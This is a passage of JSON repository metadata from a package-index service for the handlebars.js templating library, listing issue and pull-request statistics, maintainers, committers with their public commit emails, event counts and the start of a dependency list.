"last_synced_at":"2025-10-29T02:01:58.807Z","issues_count":151,"pull_requests_count":103,"avg_time_to_close_issue":20331079.744897958,"avg_time_to_close_pull_request":20206605.742857143,"issues_closed_count":98,"pull_requests_closed_count":70,"pull_request_authors_count":40,"issue_authors_count":134,"avg_comments_per_issue":3.1788079470198674,"avg_comments_per_pull_request":1.7087378640776698,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":22,"past_year_pull_requests_count":14,"past_year_avg_time_to_close_issue":3394153.3333333335,"past_year_avg_time_to_close_pull_request":115209.33333333333,"past_year_issues_closed_count":6,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":0.7727272727272727,"past_year_avg_comments_per_pull_request":0.5,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":2,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhandlebars-lang%2Fhandlebars.js/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2226026,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}}],"commits":{"id":6569,"full_name":"handlebars-lang/handlebars.js","default_branch":"master","total_commits":1752,"total_committers":204,"total_bot_commits":0,"total_bot_committers":0,"mean_commits":8.588235294117647,"dds":0.5285388127853881,"past_year_total_commits":33,"past_year_total_committers":6,"past_year_total_bot_commits":0,"past_year_total_bot_committers":0,"past_year_mean_commits":5.5,"past_year_dds":0.303030303030303,"last_synced_at":"2026-07-12T09:04:03.561Z","last_synced_commit":"13a7a679910d2adbfe7f6fad61ce8f98426b0378","created_at":"2023-03-07T09:42:20.939Z","updated_at":"2026-07-12T09:02:57.899Z","committers":[{"name":"kpdecker","email":"kpdecker@gmail.com","login":"kpdecker","count":826},{"name":"Nils Knappmeier","email":"github@knappi.org","login":"nknapp","count":217},{"name":"wycats","email":"wycats@gmail.com","login":"wycats","count":111},{"name":"Alan Johnson","email":"alan@commondream.net","login":"nalanj","count":111},{"name":"Jakob Linskeseder","email":"jakob@linskeseder.com","login":"jaylinski","count":62},{"name":"tomhuda","email":"tomhuda@strobecorp.com","login":null,"count":23},{"name":"Igor Savin","email":"iselwin@gmail.com","login":"kibertoad","count":23},{"name":"Hannah Wolfe","email":"erisds@gmail.com","login":"ErisDS","count":21},{"name":"tomhuda","email":"tomhuda@tilde.io","login":null,"count":16},{"name":"Peter Wagenet","email":"peter.wagenet@gmail.com","login":"wagenet","count":15},{"name":"Lon Ingram","email":"lawnsea@gmail.com","login":"lawnsea","count":9},{"name":"Les Hill","email":"leshill@gmail.com","login":"leshill","count":8},{"name":"Jason Davies","email":"jason@jasondavies.com","login":"jasondavies","count":8},{"name":"Blake Embrey","email":"hello@blakeembrey.com","login":"blakeembrey","count":6},{"name":"Martin Muñoz","email":"im.mmun@gmail.com","login":"mmun","count":6},{"name":"Tommy Messbauer","email":"tommy@vast.com","login":null,"count":6},{"name":"Yehuda Katz","email":"tomhuda@Yehudas-iMac.local","login":null,"count":5},{"name":"Luiz Américo","email":"luizamericop@gmail.com","login":"blikblum","count":5},{"name":"Ryan Grove","email":"ryan@wonko.com","login":"rgrove","count":5},{"name":"Marcos Marado","email":"mindboosternoori@gmail.com","login":"marado","count":5},{"name":"Kabir","email":"kabirbaidhya@gmail.com","login":"kabirbaidhya","count":4},{"name":"machty","email":"machty@gmail.com","login":"machty","count":4},{"name":"Eric Nielsen","email":"eric@amalgamar.com.br","login":"ericbn","count":4},{"name":"Daniel Marcotte","email":"dmarcotte@gmail.com","login":"dmarcotte","count":4},{"name":"Qiang Li","email":"liqiang372@gmail.com","login":"liqiang372","count":3},{"name":"Ryunosuke SATO","email":"tricknotes.rs@gmail.com","login":"tricknotes","count":3},{"name":"Dennis Kuczynski","email":"dennis.kuczynski@gmail.com","login":"denniskuczynski","count":3},{"name":"Zach Carter","email":"zack.carter@gmail.com","login":"zaach","count":3},{"name":"Travis Nelson","email":"travis.o.nelson@gmail.com","login":"travnels","count":3},{"name":"Theodore Brown","email":"theodorejb@outlook.com","login":"theodorejb","count":3},{"name":"Ryan Lewis","email":"ryanharrisonlewis@gmail.com","login":"ryanmurakami","count":3},{"name":"Alex Sexton","email":"AlexSexton@gmail.com","login":"SlexAxton","count":3},{"name":"Jesse Clark","email":"jjclark1982@gmail.com","login":"jjclark1982","count":3},{"name":"Joel Wietelmann","email":"jwietelmann@gmail.com","login":"jwietelmann","count":3},{"name":"Kiall Mac Innes","email":"kiall@managedit.ie","login":"kiall","count":3},{"name":"Mohamed Akram","email":"mohd.akram@outlook.com","login":"mohd-akram","count":3},{"name":"Marcio Junior","email":"marciojunior_eu@yahoo.com.br","login":"marcioj","count":3},{"name":"Paul Falgout","email":"paul@otterball.com","login":"paulfalgout","count":3},{"name":"Blessan Mathew","email":"blessenm@gmail.com","login":null,"count":3},{"name":"David Stone","email":"david@gixug.com","login":"stabbylambda","count":2},{"name":"Chris Broadfoot","email":"chris@chrisbroadfoot.id.au","login":"broady","count":2},{"name":"Charles O'Farrell","email":"charleso@charleso.org","login":"charleso","count":2},{"name":"Brian Kaull","email":"bjkaull@yahoo.com","login":"bkaull","count":2},{"name":"Aymerick","email":"aymerick@jehanne.org","login":"aymerick","count":2},{"name":"Avi Vahl","email":"avi.vahl@wix.com","login":"AviVahl","count":2},{"name":"Anders D. Johnson","email":"adjohnson916","login":"adjohnson916","count":2},{"name":"Joonas Lahtinen","email":"joonas.lahtinen@iki.fi","login":"joonas-lahtinen","count":2},{"name":"Jonas Thelemann","email":"e-mail@jonas-thelemann.de","login":"dargmuesli","count":2},{"name":"Jon Jensen","email":"jenseng@gmail.com","login":"jenseng","count":2},{"name":"Jean-Pierre Fiset","email":"jp@fiset.ca","login":"jpfiset","count":2},{"name":"John Boehr","email":"jbboehr@gmail.com","login":"jbboehr","count":2},{"name":"James Maroney","email":"james.maroney@gmail.com","login":"JamesMaroney","count":2},{"name":"James Fuller","email":"jblotus@gmail.com","login":"jblotus","count":2},{"name":"MikeMayer","email":"mike@mikemayer.me","login":"MikeMayer","count":2},{"name":"Mr. Leo","email":"leo","login":"leo","count":2},{"name":"Nik Nyby","email":"nnyby@columbia.edu","login":"nikolas","count":2},{"name":"Oge Nnadi","email":"oge@nnadi.org","login":"ogennadi","count":2},{"name":"Paul Banks","email":"banks@banksdesigns.co.uk","login":"banks","count":2},{"name":"Phil Davis","email":"phil@jankaritech.com","login":"phil-davis","count":2},{"name":"Raimonds Simanovskis","email":"raimonds.simanovskis@gmail.com","login":"rsim","count":2},{"name":"roydukkey","email":"roydukkey","login":"roydukkey","count":2},{"name":"ole-martin","email":"47389666+ole-martin","login":"ole-martin","count":2},{"name":"Schuyler Duveen","email":"sky@skyb.us","login":"schuyler1d","count":2},{"name":"Spike Brehm","email":"ocelot@gmail.com","login":"spikebrehm","count":2},{"name":"Tim Wang","email":"timwangdev@gmail.com","login":"timwangdev","count":2},{"name":"Timothy Lindvall","email":"tlindvall@linkedin.com","login":"timlindvall","count":2},{"name":"Tobias Bieniek","email":"tobias.bieniek@gmail.com","login":"Turbo87","count":2},{"name":"gleitz","email":"gleitz@mit.edu","login":"gleitz","count":2},{"name":"Jakob Linskeseder","email":"jakob.linskeseder@karriere.at","login":null,"count":2},{"name":"Ryan Eastridge","email":"ryan@eastridge.xxx","login":null,"count":2},{"name":"Jesse Ezell","email":"jesse.ezell@neudesic.com","login":null,"count":2},{"name":"ismailjones","email":"ismail.nospam@zoho.com","login":"papasmile","count":2},{"name":"Mark Christian","email":"mark@slack-corp.com","login":null,"count":2},{"name":"Maxb","email":"maxb.personal@gmail.com","login":"max-b","count":2},{"name":"Gennadiy Litvinyuk","email":"gennadiy@gmail.com","login":"gennadiylitvinyuk","count":2},{"name":"DevinClark","email":"dclarkdesign@gmail.com","login":"DevinClark","count":2},{"name":"johneke","email":"john.eke@gmail.com","login":"johneke","count":2},{"name":"Alex Navasardyan","email":"alex.navasardyan@yahoo.com","login":"twokul","count":1},{"name":"Alex Stupka","email":"astupka21@yahoo.com","login":"astupka","count":1},{"name":"Alexander Kireyev","email":"ak.chatman.media@gmail.com","login":"chatman-media","count":1},{"name":"Alexander Schramm","email":"alexander.schramm96@gmail.com","login":"Mindar","count":1},{"name":"Andrew Benton","email":"andrewmbenton@gmail.com","login":"andrewmbenton","count":1},{"name":"Andrew Leedham","email":"AndrewLeedham@Outlook.com","login":"AndrewLeedham","count":1},{"name":"Andrey Lushchick","email":"andrew@lushchick.org","login":"lushchick","count":1},{"name":"Anton Rudeshko","email":"anton@rudeshko.com","login":"anton-rudeshko","count":1},{"name":"Aori Nevo","email":"aorinevo@gmail.com","login":"aorinevo","count":1},{"name":"Davide Mancuso","email":"davide.mancuso@gmail.com","login":"atomictag","count":1},{"name":"Alan Johnson","email":"alan@gnoso.com","login":null,"count":1},{"name":"Cristi Burcă","email":"scribu@gmail.com","login":null,"count":1},{"name":"Christian Wesselhoeft","email":"christian@cwesselhoeft.com","login":null,"count":1},{"name":"Chris Garrett","email":"cgarrett@linkedin.com","login":null,"count":1},{"name":"James Conroy-Finn","email":"james@logi.cl","login":null,"count":1},{"name":"James Gorrie","email":"james@bravenewtalent.com","login":null,"count":1},{"name":"John Steidley","email":"john@blendlabs.com","login":null,"count":1},{"name":"Justin Walsh","email":"justin@todaymade.com","login":null,"count":1},{"name":"Martin Davidsson","email":"martin@shortcast.com","login":null,"count":1},{"name":"Matthew Flaschen","email":"mflaschen@wikimedia.org","login":null,"count":1},{"name":"Nate Irwin","email":"nate@nateirwin.net","login":null,"count":1},{"name":"Stanley Stuart","email":"stanley@stan.li","login":null,"count":1},{"name":"Tom X. Tobin","email":"tomxtobin@tomxtobin.com","login":null,"count":1},{"name":"Tyson Tate","email":"tyson@tysontate.com","login":null,"count":1},{"name":"antelle","email":"dmitryvit@gmail.com","login":null,"count":1},{"name":"inook","email":"pumpkincorp@hotmail.com","login":null,"count":1},{"name":"Tim Fischbach","email":"tfischbach@codevise.de","login":"tf","count":1},{"name":"Thomas Boyt","email":"me@thomasboyt.com","login":"thomasboyt","count":1},{"name":"Thaddee Tyl","email":"thaddee.tyl@gmail.com","login":"espadrine","count":1},{"name":"Stefan Penner","email":"stefan.penner@gmail.com","login":"stefanpenner","count":1},{"name":"Steeve Lennmark","email":"steevel@handeldsbanken.se","login":"snorkypie","count":1},{"name":"Stanley Stuart","email":"dstanley.stuart@gmail.com","login":"fivetanley","count":1},{"name":"Simon Cropp","email":"simon.cropp@gmail.com","login":"SimonCropp","count":1},{"name":"Shon Frazier","email":"shon.frazier@gmail.com","login":"ShonFrazier","count":1},{"name":"Sharang Dashputre","email":"sharang.d@gmail.com","login":"sharang-d","count":1},{"name":"Shannon Moeller","email":"me@shannonmoeller.com","login":"shannonmoeller","count":1},{"name":"Seyed Mohammad Mahdi Hatami","email":"hatamik7@gmail.com","login":"smmhatami","count":1},{"name":"Scott González","email":"scott.gonzalez@gmail.com","login":"scottgonzalez","count":1},{"name":"Saleh Batati","email":"0xack13@gmail.com","login":"0xack13","count":1},{"name":"Ross Hadden","email":"rosshadden@gmail.com","login":"rosshadden","count":1},{"name":"Robin Houston","email":"robin.houston@gmail.com","login":"robinhouston","count":1},{"name":"Robert Jackson","email":"me@rwjblue.com","login":"rwjblue","count":1},{"name":"Peter Hoffmann","email":"Hoffmann.P@gmx.net","login":"HoffmannP","count":1},{"name":"Pedro Lamas","email":"pedrolamas@gmail.com","login":"pedrolamas","count":1},{"name":"Paul Lynch","email":"plynch@mail.nih.gov","login":"plynchnlm","count":1},{"name":"tomByrer","email":"tomByrer@gmail.com","login":"tomByrer","count":1},{"name":"Jordan Mele","email":"jordan.mele@outlook.com.au","login":"Silic0nS0ldier","count":1},{"name":"Or Neeman","email":"oneeman@gmail.com","login":"oneeman","count":1},{"name":"Odin Dutton","email":"odindutton@gmail.com","login":"twe4ked","count":1},{"name":"Nicolás Hock Isaza","email":"nhocki@gmail.com","login":"nhocki","count":1},{"name":"Nicolas Chambrier","email":"naholyr@gmail.com","login":"naholyr","count":1},{"name":"Tom Mrazauskas","email":"tom@mrazauskas.de","login":"mrazauskas","count":1},{"name":"tim","email":"timdeschryver@outlook.com","login":"timdeschryver","count":1},{"name":"sohibe","email":"sohibe@gmail.com","login":"sohibegit","count":1},{"name":"manishsaraan","email":"manish021js@gmail.com","login":"manishsaraan","count":1},{"name":"king6cong","email":"king6cong@gmail.com","login":"king6cong","count":1},{"name":"jonahss","email":"jonahss@gmail.com","login":"Jonahss","count":1},{"name":"hashchange","email":"hashchange","login":"hashchange","count":1},{"name":"grassick","email":"clayton@claytronics.org","login":"grassick","count":1},{"name":"fancyoung","email":"siyang1982@msn.com","login":"fancyoung","count":1},{"name":"cpojer","email":"christoph.pojer@gmail.com","login":"cpojer","count":1},{"name":"choage","email":"iam@chrishoage.com","login":"chrishoage","count":1},{"name":"biodiscus","email":"biodiscus@gmail.com","login":"webdiscus","count":1},{"name":"arturmakaranka","email":"artur_makaranka@epam.com","login":"arturmakaranka","count":1},{"name":"aaharu","email":"aaharu@hotmail.com","login":"aaharu","count":1},{"name":"Wouter Van Schandevijl","email":"woutervs@hotmail.com","login":"Laoujin","count":1},{"name":"William Entriken","email":"github.com@phor.net","login":"fulldecent","count":1},{"name":"Vladimir Kapustin","email":"kapooostin@gmail.com","login":"kapooostin","count":1},{"name":"Victor Bastos","email":"victorwpbastos@gmail.com","login":"victorwpbastos","count":1},{"name":"Utkarsh Sengar","email":"utkarsh2012@gmail.com","login":"utsengar","count":1},{"name":"Tuomas Palenius","email":"tuomas.palenius@gmail.com","login":"artiee","count":1},{"name":"PatrickJS","email":"github@gdi2290.com","login":"PatrickJS","count":1},{"name":"Tom Locke","email":"tom@tomlocke.com","login":"tslocke","count":1},{"name":"Tom Dale","email":"tom@tomdale.net","login":"tomdale","count":1},{"name":"Toby Harris","email":"tobyharris93@gmail.com","login":"ouijan","count":1},{"name":"Tim Gates","email":"tim.gates@iress.com","login":"timgates42","count":1},{"name":"Jean-Baptiste Musso","email":"jbmusso+github@gmail.com","login":"jbmusso","count":1},{"name":"James Wilson","email":"drakeapps","login":"drakeapps","count":1},{"name":"Ilja leyberman","email":"7ilya@gmx.de","login":"thecodemonkey","count":1},{"name":"Ian Young","email":"ian.greenleaf@gmail.com","login":"iangreenleaf","count":1},{"name":"Godfrey Chan","email":"godfreykfc@gmail.com","login":"chancancode","count":1},{"name":"Giles Bowkett","email":"gilesb@gmail.com","login":"gilesbowkett","count":1},{"name":"Elving Rodriguez","email":"elving.pr@gmail.com","login":"elving","count":1},{"name":"Eli Skeggs","email":"skeggse","login":"skeggse","count":1},{"name":"Douglas Christopher Wilson","email":"doug@somethingdoug.com","login":"dougwilson","count":1},{"name":"Dickson Wong","email":"diwo","login":"diwo","count":1},{"name":"Parker Selbert","email":"parker@sorentwo.com","login":"sorentwo","count":1},{"name":"Benoit Vallée","email":"bvallee@lafourchette.com","login":"bvallee-thefork","count":1},{"name":"Bogdan Chadkin","email":"trysound@yandex.ru","login":"TrySound","count":1},{"name":"Brett Bim","email":"bbim@onetechnologies.net","login":"ot-brett-bim","count":1},{"name":"Brian Palmer","email":"brianp@instructure.com","login":"codekitchen","count":1},{"name":"Bryan Woods","email":"bryan@dropio.com","login":"bryanwoods","count":1},{"name":"Caleb Mazalevskis","email":"maikuolan@gmail.com","login":"Maikuolan","count":1},{"name":"Changwoo Park","email":"pismute@gmail.com","login":"pismute","count":1},{"name":"Chris Pall","email":"chrispall@gmail.com","login":"cgp","count":1},{"name":"Christian Clauss","email":"cclauss@me.com","login":"cclauss","count":1},{"name":"Dan Manges","email":"dan@fractalsurfing.com","login":"dan-manges","count":1},{"name":"Dario Sneidermanis","email":"dariosn@gmail.com","login":"esneider","count":1},{"name":"1337617","email":"113424449+1337617","login":"1337617","count":1},{"name":"AQNOUCH Mohammed","email":"aqnouch.mohammed@gmail.com","login":"maqnouch","count":1},{"name":"Alberto La Rocca","email":"a71104@gmail.com","login":"71104","count":1},{"name":"Nick Fisher","email":"spadgos@gmail.com","login":"spadgos","count":1},{"name":"Nathaniel Bibler","email":"git@nathanielbibler.com","login":"nbibler","count":1},{"name":"Mike Petrovich","email":"michael.c.petrovich@gmail.com","login":"mpetrovich","count":1},{"name":"Mike Moulton","email":"mike@meltmedia.com","login":"mmoulton","count":1},{"name":"Mike","email":"barbeque","login":"barbeque","count":1},{"name":"Mehdi","email":"56712514+s-mrb","login":"s-mrb","count":1},{"name":"Matteo Agosti","email":"matteo.agosti@gmail.com","login":"matteoagosti","count":1},{"name":"Matt Hinchliffe","email":"i-like-robots","login":"i-like-robots","count":1},{"name":"Martin Kleppmann","email":"martin@rapportive.com","login":"ept","count":1},{"name":"Marko Zabcic","email":"gm.marko@gmail.com","login":"MarkoZabcic","count":1},{"name":"Mark DiMarco","email":"mark.dimarco@gmail.com","login":"markmarkoh","count":1},{"name":"MajorBreakfast","email":"mail@josefbrandl.de","login":"MajorBreakfast","count":1},{"name":"Lukas Drgon","email":"lukas.drgon@gmail.com","login":"LukasDrgon","count":1},{"name":"Laurie Harper","email":"laurie.harper.ca@gmail.com","login":"laurie71","count":1},{"name":"Karl Westin","email":"karl.westin@gmail.com","login":"karlwestin","count":1},{"name":"Karl Johan Kleist","email":"karl.johan@kleist-it-consulting.de","login":"k-j-kleist","count":1},{"name":"DeeDeeG","email":"DeeDeeG","login":"DeeDeeG","count":1},{"name":"Jonathan Roes","email":"jroes@jroes.net","login":"jroes","count":1},{"name":"Jon Schlinkert","email":"dev@sellside.com","login":"jonschlinkert","count":1},{"name":"Jon Sadka","email":"Jonsadka@gmail.com","login":"jonsadka","count":1},{"name":"John Kreitlow","email":"john.kreitlow@gmail.com","login":"radium-v","count":1},{"name":"John Freeman","email":"jfreeman@cse.tamu.edu","login":"thejohnfreeman","count":1},{"name":"Joe Wilm","email":"jdwilm@gmail.com","login":"jwilm","count":1},{"name":"Jody Clements","email":"jody@neomorphic.co.uk","login":"neomorphic","count":1},{"name":"Jeroen van Dijk","email":"jeroentjevandijk@gmail.com","login":"jeroenvandijk","count":1},{"name":"Alex Jeng","email":"alexanderjeng@gmail.com","login":"AlexJeng","count":1}],"past_year_committers":[{"name":"Igor Savin","email":"iselwin@gmail.com","login":"kibertoad","count":23},{"name":"Jakob Linskeseder","email":"jakob@linskeseder.com","login":"jaylinski","count":4},{"name":"Theodore Brown","email":"theodorejb@outlook.com","login":"theodorejb","count":3},{"name":"William Entriken","email":"github.com@phor.net","login":"fulldecent","count":1},{"name":"Tom Mrazauskas","email":"tom@mrazauskas.de","login":"mrazauskas","count":1},{"name":"Alexander Kireyev","email":"ak.chatman.media@gmail.com","login":"chatman-media","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-07-16T00:00:09.319Z","repositories_count":6351258,"commits_count":859868678,"contributors_count":35538971,"owners_count":1213640,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"handlebars-lang/handlebars.js","html_url":"https://github.com/handlebars-lang/handlebars.js","last_synced_at":"2026-07-10T08:00:54.096Z","status":"active","issues_count":161,"pull_requests_count":133,"avg_time_to_close_issue":20524950.96153846,"avg_time_to_close_pull_request":16796463.59090909,"issues_closed_count":104,"pull_requests_closed_count":88,"pull_request_authors_count":53,"issue_authors_count":142,"avg_comments_per_issue":3.111801242236025,"avg_comments_per_pull_request":1.699248120300752,"merged_pull_requests_count":57,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":32,"past_year_avg_time_to_close_issue":1112205.857142857,"past_year_avg_time_to_close_pull_request":822488.2222222222,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":18,"past_year_pull_request_authors_count":16,"past_year_issue_authors_count":17,"past_year_avg_comments_per_issue":1.263157894736842,"past_year_avg_comments_per_pull_request":1.40625,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":15,"created_at":"2023-05-10T21:35:02.614Z","updated_at":"2026-07-10T08:00:54.096Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","issue_labels_count":{"table":{"needs investigation":13,"bug":12,"docs-needed":9,"feature":9,"topic for discussion":4,"help wanted":3,"unverified":3,"typings":3,"docs":2,"breaking change":1,"item for language spec":1,"performance":1}},"pull_request_labels_count":{"table":{"feature":5,"topic for discussion":3,"test-case missing":3,"bug":2,"item for language spec":1,"docs-needed":1,"breaking change":1,"typings":1}},"issue_author_associations_count":{"table":{"NONE":144,"COLLABORATOR":9,"MEMBER":4,"CONTRIBUTOR":4}},"pull_request_author_associations_count":{"table":{"NONE":53,"CONTRIBUTOR":39,"MEMBER":32,"COLLABORATOR":9}},"issue_authors":{"table":{"nknapp":9,"jaylinski":4,"ada485431-svg":2,"theodorejb":2,"blaasvaer":2,"vassudanagunta":2,"satyajitnayk":2,"null-undefnied":2,"JonathanWilbur":2,"strukturart":2,"j-000":1,"ogonkov":1,"yxh10":1,"win7killer":1,"stevemk14ebr":1,"KunalSin9h":1,"arturdzm":1,"dylanpiera":1,"evilgeniuscreative":1,"ygangrades":1,"agashish":1,"danny0838":1,"jorodi":1,"pakalai":1,"Rahafalmadani":1,"ulriklystbaek":1,"hyprdia":1,"Eric24":1,"pravi":1,"rottmann":1,"robincsamuel":1,"arturober":1,"CSTPranshu":1,"BalkrishnaBhat":1,"hamzaelasmar":1,"TokugawaTakeshi":1,"khanifikhsanudin":1,"silverwind":1,"duard":1,"wx18390999871":1,"asgraf":1,"HanxuGit":1,"jbsulli":1,"derekbsnider":1,"dennisblack666":1,"leonardlin":1,"kksarma":1,"navalamol":1,"xenoterracide":1,"gzurbach":1,"nomoreyou":1,"agrande-ea":1,"vfonic":1,"danbopes":1,"bcomnes":1,"fivetanley":1,"christophermhawaudio":1,"isatria":1,"wszgrcy":1,"LastDragon-ru":1,"shoaib9804725":1,"sdonnet":1,"macgyver":1,"papandreou":1,"camilonova":1,"andersk":1,"the890vn":1,"onlynone":1,"rogadev":1,"iamstarkov":1,"dsavenko":1,"EPJ-suporte2-dev":1,"a2425rdl":1,"JuergenSimon":1,"ubourdon":1,"marktyers":1,"xmedeko":1,"jurikonradi":1,"slarti-b":1,"jamesdayo080-cell":1,"tnwanna":1,"roipoussiere":1,"wolfjazz":1,"abhisekp":1,"btalb":1,"jvassev":1,"75lb":1,"aarek-eng":1,"psmoros":1,"jinjin99":1,"olsonpm":1,"tbinna":1,"galens":1,"Crazyafk":1,"Fadorico":1,"AnirudhaGohokar":1,"dcantu96":1,"simonfile":1,"eddieran":1,"cburatto":1,"andreicristianpetcu":1,"tylerablackham":1,"jdeepak14":1,"ReneZeidler":1,"xjrcode":1,"arungowda757":1,"sekoyo":1,"Whoffie":1,"Schommer79":1,"mojavelinux":1,"SirWumpus":1,"brdandu":1,"xreider":1,"UnquietCode":1,"pgrever":1,"hxgqh":1,"tiagocaus":1,"sergedahdouh":1,"legrego":1,"Milner39":1,"ghost":1,"mohd-akram":1,"okineadev":1,"romannurik":1,"akorchyn":1,"anghenfil":1,"lukeshiru":1,"terrablue":1,"melodyxpot":1,"steveklett":1,"pierre-grossmann-oinio":1,"Jl2756550":1,"mb-realpage":1,"Trung229":1,"yihchu":1,"Megidd":1,"milankonir":1,"bagheriali2001":1,"mcblum":1,"JerryC8080":1,"stevewillard":1,"believelody":1}},"pull_request_authors":{"table":{"jaylinski":32,"mohd-akram":11,"nknapp":9,"kibertoad":8,"andersk":4,"smmhatami":4,"tylerablackham":3,"Laoujin":3,"theodorejb":3,"vassudanagunta":2,"mb-realpage":2,"xmedeko":2,"suryarajendhran":2,"biplavbarua":2,"aalimovs":2,"marnixk":2,"satyajitnayk":2,"cclauss":2,"aorinevo":2,"jaredwray":2,"Binlogo":2,"chatman-media":1,"karlvr":1,"thekiwi":1,"eddieran":1,"JasonnnW3000":1,"roggervalf":1,"cyphercodes":1,"drakeapps":1,"mrfunctionC3":1,"mrazauskas":1,"jesperhagstrom":1,"SAY-5":1,"btea":1,"bvallee-thefork":1,"trivikr":1,"TorMatzAndren":1,"bitwiseman":1,"rlsf":1,"bdiz":1,"dargmuesli":1,"graphicore":1,"webdiscus":1,"1337617":1,"Kelleretoro":1,"stevemk14ebr":1,"alanshaw":1,"manunio":1,"arturmakaranka":1,"pakalai":1,"puiterwijk":1,"ATOM00blue":1,"fulldecent":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-07-16T00:00:20.511Z","repositories_count":14861458,"issues_count":32331887,"pull_requests_count":106257900,"authors_count":11347779,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"bug":1,"docs":1}},"past_year_pull_request_labels_count":{"table":{"feature":1}},"past_year_issue_author_associations_count":{"table":{"NONE":16,"CONTRIBUTOR":2,"MEMBER":1}},"past_year_pull_request_author_associations_count":{"table":{"NONE":14,"CONTRIBUTOR":12,"MEMBER":5}},"past_year_issue_authors":{"table":{"ada485431-svg":2,"theodorejb":2,"tylerablackham":1,"Schommer79":1,"okineadev":1,"ogonkov":1,"macgyver":1,"Jl2756550":1,"jaylinski":1,"jamesdayo080-cell":1,"eddieran":1,"Crazyafk":1,"bcomnes":1,"arungowda757":1,"arturdzm":1,"anghenfil":1,"agrande-ea":1}},"past_year_pull_request_authors":{"table":{"kibertoad":8,"jaylinski":5,"theodorejb":3,"tylerablackham":3,"biplavbarua":2,"ATOM00blue":1,"btea":1,"chatman-media":1,"cyphercodes":1,"eddieran":1,"fulldecent":1,"Kelleretoro":1,"mrazauskas":1,"SAY-5":1,"TorMatzAndren":1}},"maintainers":[{"table":{"login":"jaylinski","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}},{"table":{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}}],"active_maintainers":[{"table":{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}}]}},"events":{"total":{"DeleteEvent":8,"PullRequestEvent":21,"ForkEvent":36,"DiscussionEvent":1,"IssuesEvent":14,"WatchEvent":543,"IssueCommentEvent":46,"PushEvent":17,"PullRequestReviewCommentEvent":27,"PullRequestReviewEvent":17,"CreateEvent":3},"last_year":{"DeleteEvent":8,"PullRequestEvent":12,"ForkEvent":8,"DiscussionEvent":1,"IssuesEvent":5,"WatchEvent":149,"IssueCommentEvent":24,"PushEvent":16,"PullRequestReviewCommentEvent":27,"PullRequestReviewEvent":15,"CreateEvent":3}},"keywords":["handlebars","mustache","templates"],"dependencies":[{"ecosystem":"npm","filepath":"package-lock.json","sha":null,"kind":"lockfile","created_at":"2022-06-29T08:07:44.556Z","updated_at":"2022-06-29T08:07:44.556Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/package-lock.json","dependencies":[{"id":93892437,"package_name":"@babel/code-frame","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892438,"package_name":"@babel/compat-data","ecosystem":"npm","requirements":"7.16.4","direct":false,"kind":"development","optional":false},{"id":93892439,"package_name":"@babel/core","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892440,"package_name":"debug","ecosystem":"npm","requirements":"4.3.3","direc